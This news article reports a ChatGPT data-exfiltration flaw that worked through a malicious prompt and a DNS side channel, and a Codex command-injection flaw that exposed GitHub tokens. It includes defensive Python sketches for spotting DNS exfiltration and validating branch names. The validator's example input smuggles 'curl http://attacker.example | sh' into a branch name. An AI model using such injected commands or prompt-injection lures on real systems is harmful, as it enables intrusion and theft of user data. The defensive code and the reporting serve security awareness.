Check Point has uncovered a vulnerability in OpenAI’s ChatGPT that allowed sensitive user data to be accessed without the user's knowledge. The researchers showed how a single malicious prompt could exploit the system and extract private conversations and files. OpenAI has since fixed the weakness, and no evidence of exploitation has been reported.

Exploiting the ChatGPT Vulnerability

ChatGPT was built with safeguards against unauthorized data sharing. However, researchers discovered that a side channel within the Linux runtime could bypass them. The method used a hidden DNS-based communication path, potentially allowing attackers to execute commands remotely without user consent. Because it triggered no warnings or user notifications, the vulnerability was a significant blind spot in AI system security.
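To make the idea of a DNS-based side channel more concrete, the sketch below shows one generic way a defender might flag DNS query names that look like they carry encoded data. It is not Check Point's technique or OpenAI's fix, and the article does not say how the data was encoded. The function names and all thresholds (`MAX_LABEL_LEN`, `MIN_ENTROPY_BITS`, `MIN_LABEL_LEN_FOR_ENTROPY`) are assumptions chosen for illustration and would need tuning against real traffic.

```python
import math
from collections import Counter

# Hypothetical thresholds for illustration only; tune against real traffic.
MAX_LABEL_LEN = 40              # labels longer than this are flagged outright
MIN_LABEL_LEN_FOR_ENTROPY = 20  # only score entropy on reasonably long labels
MIN_ENTROPY_BITS = 3.5          # bits per character that counts as "random-looking"


def shannon_entropy(text: str) -> float:
    """Return the Shannon entropy of text in bits per character."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_like_dns_exfiltration(qname: str) -> bool:
    """Heuristically flag a DNS query name whose subdomain labels look encoded.

    The last two labels are treated as the registered domain, which is a
    simplification (it ignores multi-part suffixes such as co.uk).
    """
    labels = qname.rstrip(".").lower().split(".")
    subdomain_labels = labels[:-2]
    for label in subdomain_labels:
        if len(label) > MAX_LABEL_LEN:
            return True
        if (
            len(label) >= MIN_LABEL_LEN_FOR_ENTROPY
            and shannon_entropy(label) >= MIN_ENTROPY_BITS
        ):
            return True
    return False


if __name__ == "__main__":
    for name in (
        "www.example.com",
        "4a6f686e20446f6520736563726574206461746121.attacker.example",
    ):
        print(name, looks_like_dns_exfiltration(name))
```

A heuristic like this produces false positives (for example, some CDN hostnames) and can be evaded by slow, low-volume encoding, so it would complement rather than replace egress controls on the runtime itself.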

Attackers could exploit the vulnerability by tricking users into entering malicious prompts under false pretenses, such as a promise to unlock premium features. The threat is even more concerning when the prompt is embedded in a custom GPT, where users might not realize they are executing harmful commands at all.

Implications for AI Security

As AI tools like ChatGPT are increasingly used in enterprise environments, the need for robust security measures grows. The vulnerability shows why organizations need additional security layers to counter prompt injections and other unforeseen behaviors in AI systems.

Eli Smadja from Check Point Research emphasized that as AI platforms evolve, relying solely on native security controls is insufficient. Organizations must establish independent security structures to operate safely in the AI era, rather than merely reacting to security incidents as they arise.

Codex Vulnerability and GitHub Token Compromise



Alongside the ChatGPT issue, a critical vulnerability was discovered in OpenAI’s Codex that could have led to unauthorized access to GitHub credentials. The flaw stemmed from improper input sanitization during task execution, which allowed attackers to inject commands through the GitHub branch name parameter.
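The class of bug described above, command injection through an unsanitized branch name, can be illustrated with a short sketch. The article does not say which command Codex ran or how OpenAI fixed it, so everything here is hypothetical: the allowlist pattern, the helper names `is_safe_branch_name` and `build_fetch_argv`, and the choice of `git fetch` are assumptions for illustration. The two ideas shown are standard defenses: validate the value against a strict allowlist, and pass it as a separate argument rather than interpolating it into a shell string.

```python
import re
from typing import List

# Hypothetical allowlist: must start with a letter or digit (so it can never
# be parsed as a command-line option), followed by a conservative character set.
_SAFE_BRANCH = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]{0,254}")


def is_safe_branch_name(name: str) -> bool:
    """Return True only for branch names made of allowlisted characters."""
    if not _SAFE_BRANCH.fullmatch(name):
        return False
    # Reject a few sequences that git itself refuses in ref names.
    if ".." in name or "//" in name or name.endswith("/") or name.endswith(".lock"):
        return False
    return True


def build_fetch_argv(branch: str) -> List[str]:
    """Build an argument list for fetching a branch, refusing unsafe names.

    Returning a list (rather than a single string) means the caller can run it
    with subprocess.run(argv) and no shell, so characters such as ';' or '$('
    are never interpreted as shell syntax.
    """
    if not is_safe_branch_name(branch):
        raise ValueError(f"unsafe branch name: {branch!r}")
    return ["git", "fetch", "origin", branch]


if __name__ == "__main__":
    print(build_fetch_argv("feature/login-fix"))
    try:
        build_fetch_argv("main; curl http://attacker.example | sh")
    except ValueError as err:
        print("rejected:", err)
```

The allowlist is deliberately stricter than what git permits in ref names; rejecting a few legitimate but unusual branch names is usually an acceptable cost for an automated agent that holds repository credentials.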

OpenAI patched the vulnerability in February 2026, following its discovery in December 2025. It affected several OpenAI platforms, including the ChatGPT website and Codex extensions. BeyondTrust highlighted the risks of privileged access in AI coding agents, which can pave the way for large-scale attacks on enterprise systems.

The findings underscore the importance of treating AI environments with the same security rigor as any traditional application, as the integration of AI into developer workflows expands the potential attack surface.

As AI tools become more integral to operations, maintaining a secure environment is crucial to prevent unauthorized data access and ensure the safety of sensitive information.